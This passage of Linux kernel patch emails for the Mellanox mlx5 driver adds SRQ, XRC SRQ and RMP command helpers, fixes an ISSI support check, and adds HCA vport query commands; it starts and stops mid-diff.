sizeof(xrcsrq_out)); + + MLX5_SET(destroy_xrc_srq_in, xrcsrq_in, opcode, + MLX5_CMD_OP_DESTROY_XRC_SRQ); + MLX5_SET(destroy_xrc_srq_in, xrcsrq_in, xrc_srqn, srq->srqn); + + return mlx5_cmd_exec_check_status(dev, xrcsrq_in, sizeof(xrcsrq_in), + xrcsrq_out, sizeof(xrcsrq_out)); +} + +static int arm_xrc_srq_cmd(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq, u16 lwm) +{ + u32 xrcsrq_in[MLX5_ST_SZ_DW(arm_xrc_srq_in)]; + u32 xrcsrq_out[MLX5_ST_SZ_DW(arm_xrc_srq_out)]; + + memset(xrcsrq_in, 0, sizeof(xrcsrq_in)); + memset(xrcsrq_out, 0, sizeof(xrcsrq_out)); + + MLX5_SET(arm_xrc_srq_in, xrcsrq_in, opcode, MLX5_CMD_OP_ARM_XRC_SRQ); + MLX5_SET(arm_xrc_srq_in, xrcsrq_in, op_mod, MLX5_ARM_XRC_SRQ_IN_OP_MOD_XRC_SRQ); + MLX5_SET(arm_xrc_srq_in, xrcsrq_in, xrc_srqn, srq->srqn); + MLX5_SET(arm_xrc_srq_in, xrcsrq_in, lwm, lwm); + + return mlx5_cmd_exec_check_status(dev, xrcsrq_in, sizeof(xrcsrq_in), + xrcsrq_out, sizeof(xrcsrq_out)); +} + +static int query_xrc_srq_cmd(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq, + struct mlx5_query_srq_mbox_out *out) +{ + u32 xrcsrq_in[MLX5_ST_SZ_DW(query_xrc_srq_in)]; + u32 *xrcsrq_out; + void *srqc; + void *xrc_srqc; + int err; + + xrcsrq_out = mlx5_vzalloc(MLX5_ST_SZ_BYTES(query_xrc_srq_out)); + if (!xrcsrq_out) + return -ENOMEM; + memset(xrcsrq_in, 0, sizeof(xrcsrq_in)); + + MLX5_SET(query_xrc_srq_in, xrcsrq_in, opcode, + MLX5_CMD_OP_QUERY_XRC_SRQ); + MLX5_SET(query_xrc_srq_in, xrcsrq_in, xrc_srqn, srq->srqn); + err = mlx5_cmd_exec_check_status(dev, xrcsrq_in, sizeof(xrcsrq_in), + xrcsrq_out, + MLX5_ST_SZ_BYTES(query_xrc_srq_out)); + if (err) + goto out; + + xrc_srqc = MLX5_ADDR_OF(query_xrc_srq_out, xrcsrq_out, + xrc_srq_context_entry); + srqc = MLX5_ADDR_OF(query_srq_out, out, srq_context_entry); + memcpy(srqc, xrc_srqc, MLX5_ST_SZ_BYTES(srqc)); + +out: + kvfree(xrcsrq_out); + return err; +} + +static int create_rmp_cmd(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, + struct mlx5_create_srq_mbox_in *in, int srq_inlen) +{ + void *create_in; + void *rmpc; + void *srqc; + int pas_size; + int inlen; + int err; + + srqc = MLX5_ADDR_OF(create_srq_in, in, srq_context_entry); + pas_size = get_pas_size(srqc); + inlen = MLX5_ST_SZ_BYTES(create_rmp_in) + pas_size; + create_in = mlx5_vzalloc(inlen); + if (!create_in) + return -ENOMEM; + + rmpc = MLX5_ADDR_OF(create_rmp_in, create_in, ctx); + + memcpy(MLX5_ADDR_OF(rmpc, rmpc, wq.pas), in->pas, pas_size); + rmpc_srqc_reformat(srqc, rmpc, true); + + err = mlx5_core_create_rmp(dev, create_in, inlen, &srq->srqn); + + kvfree(create_in); + return err; +} + +static int destroy_rmp_cmd(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq) +{ + return mlx5_core_destroy_rmp(dev, srq->srqn); +} + +static int arm_rmp_cmd(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq, + u16 lwm) +{ + void *in; + void *rmpc; + void *wq; + void *bitmask; + int err; + + in = mlx5_vzalloc(MLX5_ST_SZ_BYTES(modify_rmp_in)); + if (!in) + return -ENOMEM; + + rmpc = MLX5_ADDR_OF(modify_rmp_in, in, ctx); + bitmask = MLX5_ADDR_OF(modify_rmp_in, in, bitmask); + wq = MLX5_ADDR_OF(rmpc, rmpc, wq); + + MLX5_SET(modify_rmp_in, in, rmp_state, MLX5_RMPC_STATE_RDY); + MLX5_SET(modify_rmp_in, in, rmpn, srq->srqn); + MLX5_SET(wq, wq, lwm, lwm); + MLX5_SET(rmp_bitmask, bitmask, lwm, 1); + MLX5_SET(rmpc, rmpc, state, MLX5_RMPC_STATE_RDY); + + err = mlx5_core_modify_rmp(dev, in, MLX5_ST_SZ_BYTES(modify_rmp_in)); + + kvfree(in); + return err; +} + +static int query_rmp_cmd(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, + struct mlx5_query_srq_mbox_out *out) +{ + u32 *rmp_out; + void *rmpc; + void *srqc; + int err; + + rmp_out = mlx5_vzalloc(MLX5_ST_SZ_BYTES(query_rmp_out)); + if (!rmp_out) + return -ENOMEM; + + err = mlx5_core_query_rmp(dev, srq->srqn, rmp_out); + if (err) + goto out; + + srqc = MLX5_ADDR_OF(query_srq_out, out, srq_context_entry); + rmpc = MLX5_ADDR_OF(query_rmp_out, rmp_out, rmp_context); + rmpc_srqc_reformat(srqc, rmpc, false); + +out: + kvfree(rmp_out); + return err; +} + +static int create_srq_split(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq, + struct mlx5_create_srq_mbox_in *in, + int inlen, int is_xrc) +{ + if (!dev->issi) + return create_srq_cmd(dev, srq, in, inlen); + else if (srq->common.res == MLX5_RES_XSRQ) + return create_xrc_srq_cmd(dev, srq, in, inlen); + else + return create_rmp_cmd(dev, srq, in, inlen); +} + +static int destroy_srq_split(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq) +{ + if (!dev->issi) + return destroy_srq_cmd(dev, srq); + else if (srq->common.res == MLX5_RES_XSRQ) + return destroy_xrc_srq_cmd(dev, srq); + else + return destroy_rmp_cmd(dev, srq); +} + +int mlx5_core_create_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, + struct mlx5_create_srq_mbox_in *in, int inlen, + int is_xrc) +{ + int err; + struct mlx5_srq_table *table = &dev->priv.srq_table; + + srq->common.res = is_xrc ? MLX5_RES_XSRQ : MLX5_RES_SRQ; + + err = create_srq_split(dev, srq, in, inlen, is_xrc); + if (err) + return err; + atomic_set(&srq->refcount, 1); init_completion(&srq->free); @@ -107,25 +461,20 @@ int mlx5_core_create_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, spin_unlock_irq(&table->lock); if (err) { mlx5_core_warn(dev, "err %d, srqn 0x%x\n", err, srq->srqn); - goto err_cmd; + goto err_destroy_srq_split; } return 0; -err_cmd: - memset(&din, 0, sizeof(din)); - memset(&dout, 0, sizeof(dout)); - din.srqn = cpu_to_be32(srq->srqn); - din.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_DESTROY_SRQ); - mlx5_cmd_exec(dev, &din, sizeof(din), &dout, sizeof(dout)); +err_destroy_srq_split: + destroy_srq_split(dev, srq); + return err; } EXPORT_SYMBOL(mlx5_core_create_srq); int mlx5_core_destroy_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq) { - struct mlx5_destroy_srq_mbox_in in; - struct mlx5_destroy_srq_mbox_out out; struct mlx5_srq_table *table = &dev->priv.srq_table; struct mlx5_core_srq *tmp; int err; @@ -142,17 +491,10 @@ int mlx5_core_destroy_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq) return -EINVAL; } - memset(&in, 0, sizeof(in)); - memset(&out, 0, sizeof(out)); - in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_DESTROY_SRQ); - in.srqn = cpu_to_be32(srq->srqn); - err = mlx5_cmd_exec(dev, &in, sizeof(in), &out, sizeof(out)); + err = destroy_srq_split(dev, srq); if (err) return err; - if (out.hdr.status) - return mlx5_cmd_status_to_err(&out.hdr); - if (atomic_dec_and_test(&srq->refcount)) complete(&srq->free); wait_for_completion(&srq->free); @@ -164,48 +506,24 @@ EXPORT_SYMBOL(mlx5_core_destroy_srq); int mlx5_core_query_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, struct mlx5_query_srq_mbox_out *out) { - struct mlx5_query_srq_mbox_in in; - int err; - - memset(&in, 0, sizeof(in)); - memset(out, 0, sizeof(*out)); - - in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_QUERY_SRQ); - in.srqn = cpu_to_be32(srq->srqn); - err = mlx5_cmd_exec(dev, &in, sizeof(in), out, sizeof(*out)); - if (err) - return err; - - if (out->hdr.status) - return mlx5_cmd_status_to_err(&out->hdr); - - return err; + if (!dev->issi) + return query_srq_cmd(dev, srq, out); + else if (srq->common.res == MLX5_RES_XSRQ) + return query_xrc_srq_cmd(dev, srq, out); + else + return query_rmp_cmd(dev, srq, out); } EXPORT_SYMBOL(mlx5_core_query_srq); int mlx5_core_arm_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, u16 lwm, int is_srq) { - struct mlx5_arm_srq_mbox_in in; - struct mlx5_arm_srq_mbox_out out; - int err; - - memset(&in, 0, sizeof(in)); - memset(&out, 0, sizeof(out)); - - in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_ARM_RQ); - in.hdr.opmod = cpu_to_be16(!!is_srq); - in.srqn = cpu_to_be32(srq->srqn); - in.lwm = cpu_to_be16(lwm); - - err = mlx5_cmd_exec(dev, &in, sizeof(in), &out, sizeof(out)); - if (err) - return err; - - if (out.hdr.status) - return mlx5_cmd_status_to_err(&out.hdr); - - return err; + if (!dev->issi) + return arm_srq_cmd(dev, srq, lwm, is_srq); + else if (srq->common.res == MLX5_RES_XSRQ) + return arm_xrc_srq_cmd(dev, srq, lwm); + else + return arm_rmp_cmd(dev, srq, lwm); } EXPORT_SYMBOL(mlx5_core_arm_srq); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/transobj.c b/drivers/net/ethernet/mellanox/mlx5/core/transobj.c index d918816ac4d8..7a120283de2c 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/transobj.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/transobj.c @@ -169,3 +169,157 @@ void mlx5_core_destroy_tis(struct mlx5_core_dev *dev, u32 tisn) mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); } + +int mlx5_core_create_rmp(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *rmpn) +{ + u32 out[MLX5_ST_SZ_DW(create_rmp_out)]; + int err; + + MLX5_SET(create_rmp_in, in, opcode, MLX5_CMD_OP_CREATE_RMP); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); + if (!err) + *rmpn = MLX5_GET(create_rmp_out, out, rmpn); + + return err; +} + +int mlx5_core_modify_rmp(struct mlx5_core_dev *dev, u32 *in, int inlen) +{ + u32 out[MLX5_ST_SZ_DW(modify_rmp_out)]; + + MLX5_SET(modify_rmp_in, in, opcode, MLX5_CMD_OP_MODIFY_RMP); + + memset(out, 0, sizeof(out)); + return mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); +} + +int mlx5_core_destroy_rmp(struct mlx5_core_dev *dev, u32 rmpn) +{ + u32 in[MLX5_ST_SZ_DW(destroy_rmp_in)]; + u32 out[MLX5_ST_SZ_DW(destroy_rmp_out)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(destroy_rmp_in, in, opcode, MLX5_CMD_OP_DESTROY_RMP); + MLX5_SET(destroy_rmp_in, in, rmpn, rmpn); + + return mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, + sizeof(out)); +} + +int mlx5_core_query_rmp(struct mlx5_core_dev *dev, u32 rmpn, u32 *out) +{ + u32 in[MLX5_ST_SZ_DW(query_rmp_in)]; + int outlen = MLX5_ST_SZ_BYTES(query_rmp_out); + + memset(in, 0, sizeof(in)); + MLX5_SET(query_rmp_in, in, opcode, MLX5_CMD_OP_QUERY_RMP); + MLX5_SET(query_rmp_in, in, rmpn, rmpn); + + return mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, outlen); +} + +int mlx5_core_arm_rmp(struct mlx5_core_dev *dev, u32 rmpn, u16 lwm) +{ + void *in; + void *rmpc; + void *wq; + void *bitmask; + int err; + + in = mlx5_vzalloc(MLX5_ST_SZ_BYTES(modify_rmp_in)); + if (!in) + return -ENOMEM; + + rmpc = MLX5_ADDR_OF(modify_rmp_in, in, ctx); + bitmask = MLX5_ADDR_OF(modify_rmp_in, in, bitmask); + wq = MLX5_ADDR_OF(rmpc, rmpc, wq); + + MLX5_SET(modify_rmp_in, in, rmp_state, MLX5_RMPC_STATE_RDY); + MLX5_SET(modify_rmp_in, in, rmpn, rmpn); + MLX5_SET(wq, wq, lwm, lwm); + MLX5_SET(rmp_bitmask, bitmask, lwm, 1); + MLX5_SET(rmpc, rmpc, state, MLX5_RMPC_STATE_RDY); + + err = mlx5_core_modify_rmp(dev, in, MLX5_ST_SZ_BYTES(modify_rmp_in)); + + kvfree(in); + + return err; +} + +int mlx5_core_create_xsrq(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *xsrqn) +{ + u32 out[MLX5_ST_SZ_DW(create_xrc_srq_out)]; + int err; + + MLX5_SET(create_xrc_srq_in, in, opcode, MLX5_CMD_OP_CREATE_XRC_SRQ); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); + if (!err) + *xsrqn = MLX5_GET(create_xrc_srq_out, out, xrc_srqn); + + return err; +} + +int mlx5_core_destroy_xsrq(struct mlx5_core_dev *dev, u32 xsrqn) +{ + u32 in[MLX5_ST_SZ_DW(destroy_xrc_srq_in)]; + u32 out[MLX5_ST_SZ_DW(destroy_xrc_srq_out)]; + + memset(in, 0, sizeof(in)); + memset(out, 0, sizeof(out)); + + MLX5_SET(destroy_xrc_srq_in, in, opcode, MLX5_CMD_OP_DESTROY_XRC_SRQ); + MLX5_SET(destroy_xrc_srq_in, in, xrc_srqn, xsrqn); + + return mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, + sizeof(out)); +} + +int mlx5_core_query_xsrq(struct mlx5_core_dev *dev, u32 xsrqn, u32 *out) +{ + u32 in[MLX5_ST_SZ_DW(query_xrc_srq_in)]; + void *srqc; + void *xrc_srqc; + int err; + + memset(in, 0, sizeof(in)); + MLX5_SET(query_xrc_srq_in, in, opcode, MLX5_CMD_OP_QUERY_XRC_SRQ); + MLX5_SET(query_xrc_srq_in, in, xrc_srqn, xsrqn); + + err = mlx5_cmd_exec_check_status(dev, in, sizeof(in), + out, + MLX5_ST_SZ_BYTES(query_xrc_srq_out)); + if (!err) { + xrc_srqc = MLX5_ADDR_OF(query_xrc_srq_out, out, + xrc_srq_context_entry); + srqc = MLX5_ADDR_OF(query_srq_out, out, srq_context_entry); + memcpy(srqc, xrc_srqc, MLX5_ST_SZ_BYTES(srqc)); + } + + return err; +} + +int mlx5_core_arm_xsrq(struct mlx5_core_dev *dev, u32 xsrqn, u16 lwm) +{ + u32 in[MLX5_ST_SZ_DW(arm_xrc_srq_in)]; + u32 out[MLX5_ST_SZ_DW(arm_xrc_srq_out)]; + + memset(in, 0, sizeof(in)); + memset(out, 0, sizeof(out)); + + MLX5_SET(arm_xrc_srq_in, in, opcode, MLX5_CMD_OP_ARM_XRC_SRQ); + MLX5_SET(arm_xrc_srq_in, in, xrc_srqn, xsrqn); + MLX5_SET(arm_xrc_srq_in, in, lwm, lwm); + MLX5_SET(arm_xrc_srq_in, in, op_mod, + MLX5_ARM_XRC_SRQ_IN_OP_MOD_XRC_SRQ); + + return mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, + sizeof(out)); +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/transobj.h b/drivers/net/ethernet/mellanox/mlx5/core/transobj.h index b71d77f61a1d..90322c11361f 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/transobj.h +++ b/drivers/net/ethernet/mellanox/mlx5/core/transobj.h @@ -47,5 +47,16 @@ void mlx5_core_destroy_tir(struct mlx5_core_dev *dev, u32 tirn); int mlx5_core_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tisn); void mlx5_core_destroy_tis(struct mlx5_core_dev *dev, u32 tisn); +int mlx5_core_create_rmp(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *rmpn); +int mlx5_core_modify_rmp(struct mlx5_core_dev *dev, u32 *in, int inlen); +int mlx5_core_destroy_rmp(struct mlx5_core_dev *dev, u32 rmpn); +int mlx5_core_query_rmp(struct mlx5_core_dev *dev, u32 rmpn, u32 *out); +int mlx5_core_arm_rmp(struct mlx5_core_dev *dev, u32 rmpn, u16 lwm); +int mlx5_core_create_xsrq(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *rmpn); +int mlx5_core_destroy_xsrq(struct mlx5_core_dev *dev, u32 rmpn); +int mlx5_core_query_xsrq(struct mlx5_core_dev *dev, u32 rmpn, u32 *out); +int mlx5_core_arm_xsrq(struct mlx5_core_dev *dev, u32 rmpn, u16 lwm); #endif /* __TRANSOBJ_H__ */ diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 7fa26f03acc1..ba9f212c94bb 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -339,6 +339,8 @@ struct mlx5_core_mr { enum mlx5_res_type { MLX5_RES_QP, + MLX5_RES_SRQ, + MLX5_RES_XSRQ, }; struct mlx5_core_rsc_common { @@ -348,6 +350,7 @@ struct mlx5_core_rsc_common { }; struct mlx5_core_srq { + struct mlx5_core_rsc_common common; /* must be first */ u32 srqn; int max; int max_gs; @@ -640,7 +643,8 @@ struct mlx5_cmd_mailbox *mlx5_alloc_cmd_mailbox_chain(struct mlx5_core_dev *dev, void mlx5_free_cmd_mailbox_chain(struct mlx5_core_dev *dev, struct mlx5_cmd_mailbox *head); int mlx5_core_create_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, - struct mlx5_create_srq_mbox_in *in, int inlen); + struct mlx5_create_srq_mbox_in *in, int inlen, + int is_xrc); int mlx5_core_destroy_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq); int mlx5_core_query_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, struct mlx5_query_srq_mbox_out *out); diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h index b27e9f6e090a..dbe2b32c0539 100644 --- a/include/linux/mlx5/mlx5_ifc.h +++ b/include/linux/mlx5/mlx5_ifc.h @@ -2022,12 +2022,9 @@ struct mlx5_ifc_srqc_bits { u8 reserved_9[0x40]; - u8 db_record_addr_h[0x20]; - - u8 db_record_addr_l[0x1e]; - u8 reserved_10[0x2]; + u8 dbr_addr[0x40]; - u8 reserved_11[0x80]; + u8 reserved_10[0x80]; }; enum { @@ -4167,6 +4164,13 @@ struct mlx5_ifc_modify_rmp_out_bits { u8 reserved_1[0x40]; }; +struct mlx5_ifc_rmp_bitmask_bits { + u8 reserved[0x20]; + + u8 reserved1[0x1f]; + u8 lwm[0x1]; +}; + struct mlx5_ifc_modify_rmp_in_bits { u8 opcode[0x10]; u8 reserved_0[0x10]; @@ -4180,7 +4184,7 @@ struct mlx5_ifc_modify_rmp_in_bits { u8 reserved_3[0x20]; - u8 modify_bitmask[0x40]; + struct mlx5_ifc_rmp_bitmask_bits bitmask; u8 reserved_4[0x40]; From e74a1db03326ecdc7c3f54a581b197a26ce5eebe Mon Sep 17 00:00:00 2001 From: Haggai Abramonvsky Date: Thu, 4 Jun 2015 19:30:39 +0300 Subject: [PATCH 710/872] net/mlx5_core: Check the return bitmask when querying ISSI The determination of the supported ISSI versions should be conditioned on the returned mask, and not only on the return status of the query ISSI command, fix that. Signed-off-by: Haggai Abramovsky Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/main.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c index 2510fed3494d..11c7216a2517 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c @@ -654,7 +654,7 @@ static int mlx5_core_set_issi(struct mlx5_core_dev *dev) dev->issi = 1; return 0; - } else if (sup_issi & (1 << 0)) { + } else if (sup_issi & (1 << 0) || !sup_issi) { return 0; } From d18a9470f89727f870db944a36223bf1bb15bdc1 Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:40 +0300 Subject: [PATCH 711/872] net/mlx5_core: Make the vport helpers available for the IB driver too Move the vport header file to be under include/linux/mlx5, such that the mlx5 IB can use it as well. Also add nic_ prefix to the vport NIC commands to differeniate between HCA vport commands and NIC vport commands. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/en.h | 2 +- drivers/net/ethernet/mellanox/mlx5/core/en_main.c | 2 +- drivers/net/ethernet/mellanox/mlx5/core/vport.c | 6 ++++-- .../mellanox/mlx5/core => include/linux/mlx5}/vport.h | 2 +- 4 files changed, 7 insertions(+), 5 deletions(-) rename {drivers/net/ethernet/mellanox/mlx5/core => include/linux/mlx5}/vport.h (95%) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en.h b/drivers/net/ethernet/mellanox/mlx5/core/en.h index cbb3c7cb53f7..e9edb7210de1 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/en.h +++ b/drivers/net/ethernet/mellanox/mlx5/core/en.h @@ -35,7 +35,7 @@ #include #include #include -#include "vport.h" +#include #include "wq.h" #include "transobj.h" #include "mlx5_core.h" diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c index 1b592913d4d7..edba09cca600 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c @@ -1715,7 +1715,7 @@ static void mlx5e_set_netdev_dev_addr(struct net_device *netdev) { struct mlx5e_priv *priv = netdev_priv(netdev); - mlx5_query_vport_mac_address(priv->mdev, netdev->dev_addr); + mlx5_query_nic_vport_mac_address(priv->mdev, netdev->dev_addr); } static void mlx5e_build_netdev(struct net_device *netdev) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/vport.c b/drivers/net/ethernet/mellanox/mlx5/core/vport.c index ba374b9a6c87..32c4e03f6d3c 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/vport.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/vport.c @@ -33,7 +33,7 @@ #include #include #include -#include "vport.h" +#include #include "mlx5_core.h" u8 mlx5_query_vport_state(struct mlx5_core_dev *mdev, u8 opmod) @@ -55,8 +55,9 @@ u8 mlx5_query_vport_state(struct mlx5_core_dev *mdev, u8 opmod) return MLX5_GET(query_vport_state_out, out, state); } +EXPORT_SYMBOL(mlx5_query_vport_state); -void mlx5_query_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr) +void mlx5_query_nic_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr) { u32 in[MLX5_ST_SZ_DW(query_nic_vport_context_in)]; u32 *out; @@ -82,3 +83,4 @@ void mlx5_query_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr) kvfree(out); } +EXPORT_SYMBOL(mlx5_query_nic_vport_mac_address); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/vport.h b/include/linux/mlx5/vport.h similarity index 95% rename from drivers/net/ethernet/mellanox/mlx5/core/vport.h rename to include/linux/mlx5/vport.h index c05ca2c3419d..99d0e9f85432 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/vport.h +++ b/include/linux/mlx5/vport.h @@ -36,6 +36,6 @@ #include u8 mlx5_query_vport_state(struct mlx5_core_dev *mdev, u8 opmod); -void mlx5_query_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr); +void mlx5_query_nic_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr); #endif /* __MLX5_VPORT_H__ */ From 707c4602cda6624940761b66a4119f1909492385 Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:41 +0300 Subject: [PATCH 712/872] net/mlx5_core: Add new query HCA vport commands Added the implementation for the following commands: 1. QUERY_HCA_VPORT_GID 2. QUERY_HCA_VPORT_PKEY 3. QUERY_HCA_VPORT_CONTEXT They will be needed when we move to work with ISSI > 0 in the IB driver too. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- .../net/ethernet/mellanox/mlx5/core/Makefile | 4 +- .../net/ethernet/mellanox/mlx5/core/main.c | 10 +- .../net/ethernet/mellanox/mlx5/core/vport.c | 259 ++++++++++++++++++ include/linux/mlx5/device.h | 13 + include/linux/mlx5/driver.h | 45 +++ include/linux/mlx5/mlx5_ifc.h | 23 +- include/linux/mlx5/vport.h | 14 + 7 files changed, 349 insertions(+), 19 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/Makefile b/drivers/net/ethernet/mellanox/mlx5/core/Makefile index 07540f732df1..26a68b8af2c5 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/Makefile +++ b/drivers/net/ethernet/mellanox/mlx5/core/Makefile @@ -2,7 +2,7 @@ obj-$(CONFIG_MLX5_CORE) += mlx5_core.o mlx5_core-y := main.o cmd.o debugfs.o fw.o eq.o uar.o pagealloc.o \ health.o mcg.o cq.o srq.o alloc.o qp.o port.o mr.o pd.o \ - mad.o transobj.o -mlx5_core-$(CONFIG_MLX5_CORE_EN) += wq.o flow_table.o vport.o \ + mad.o transobj.o vport.o +mlx5_core-$(CONFIG_MLX5_CORE_EN) += wq.o flow_table.o \ en_main.o en_flow_table.o en_ethtool.o en_tx.o en_rx.o \ en_txrx.o diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c index 11c7216a2517..58354122dfe4 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c @@ -284,14 +284,6 @@ static u16 to_fw_pkey_sz(u32 size) } } -static u16 to_sw_pkey_sz(int pkey_sz) -{ - if (pkey_sz > MLX5_MAX_LOG_PKEY_TABLE) - return 0; - - return MLX5_MIN_PKEY_TABLE_SIZE << pkey_sz; -} - int mlx5_core_get_caps(struct mlx5_core_dev *dev, enum mlx5_cap_type cap_type, enum mlx5_cap_mode cap_mode) { @@ -386,7 +378,7 @@ static int handle_hca_cap(struct mlx5_core_dev *dev) MLX5_ST_SZ_BYTES(cmd_hca_cap)); mlx5_core_dbg(dev, "Current Pkey table size %d Setting new size %d\n", - to_sw_pkey_sz(MLX5_CAP_GEN(dev, pkey_table_size)), + mlx5_to_sw_pkey_sz(MLX5_CAP_GEN(dev, pkey_table_size)), 128); /* we limit the size of the pkey table to 128 entries for now */ MLX5_SET(cmd_hca_cap, set_hca_cap, pkey_table_size, diff --git a/drivers/net/ethernet/mellanox/mlx5/core/vport.c b/drivers/net/ethernet/mellanox/mlx5/core/vport.c index 32c4e03f6d3c..20150ffa8b16 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/vport.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/vport.c @@ -84,3 +84,262 @@ void mlx5_query_nic_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr) kvfree(out); } EXPORT_SYMBOL(mlx5_query_nic_vport_mac_address); + +int mlx5_query_hca_vport_gid(struct mlx5_core_dev *dev, u8 other_vport, + u8 port_num, u16 vf_num, u16 gid_index, + union ib_gid *gid) +{ + int in_sz = MLX5_ST_SZ_BYTES(query_hca_vport_gid_in); + int out_sz = MLX5_ST_SZ_BYTES(query_hca_vport_gid_out); + int is_group_manager; + void *out = NULL; + void *in = NULL; + union ib_gid *tmp; + int tbsz; + int nout; + int err; + + is_group_manager = MLX5_CAP_GEN(dev, vport_group_manager); + tbsz = mlx5_get_gid_table_len(MLX5_CAP_GEN(dev, gid_table_size)); + mlx5_core_dbg(dev, "vf_num %d, index %d, gid_table_size %d\n", + vf_num, gid_index, tbsz); + + if (gid_index > tbsz && gid_index != 0xffff) + return -EINVAL; + + if (gid_index == 0xffff) + nout = tbsz; + else + nout = 1; + + out_sz += nout * sizeof(*gid); + + in = kzalloc(in_sz, GFP_KERNEL); + out = kzalloc(out_sz, GFP_KERNEL); + if (!in || !out) { + err = -ENOMEM; + goto out; + } + + MLX5_SET(query_hca_vport_gid_in, in, opcode, MLX5_CMD_OP_QUERY_HCA_VPORT_GID); + if (other_vport) { + if (is_group_manager) { + MLX5_SET(query_hca_vport_gid_in, in, vport_number, vf_num); + MLX5_SET(query_hca_vport_gid_in, in, other_vport, 1); + } else { + err = -EPERM; + goto out; + } + } + MLX5_SET(query_hca_vport_gid_in, in, gid_index, gid_index); + + if (MLX5_CAP_GEN(dev, num_ports) == 2) + MLX5_SET(query_hca_vport_gid_in, in, port_num, port_num); + + err = mlx5_cmd_exec(dev, in, in_sz, out, out_sz); + if (err) + goto out; + + err = mlx5_cmd_status_to_err_v2(out); + if (err) + goto out; + + tmp = out + MLX5_ST_SZ_BYTES(query_hca_vport_gid_out); + gid->global.subnet_prefix = tmp->global.subnet_prefix; + gid->global.interface_id = tmp->global.interface_id; + +out: + kfree(in); + kfree(out); + return err; +} +EXPORT_SYMBOL_GPL(mlx5_query_hca_vport_gid); + +int mlx5_query_hca_vport_pkey(struct mlx5_core_dev *dev, u8 other_vport, + u8 port_num, u16 vf_num, u16 pkey_index, + u16 *pkey) +{ + int in_sz = 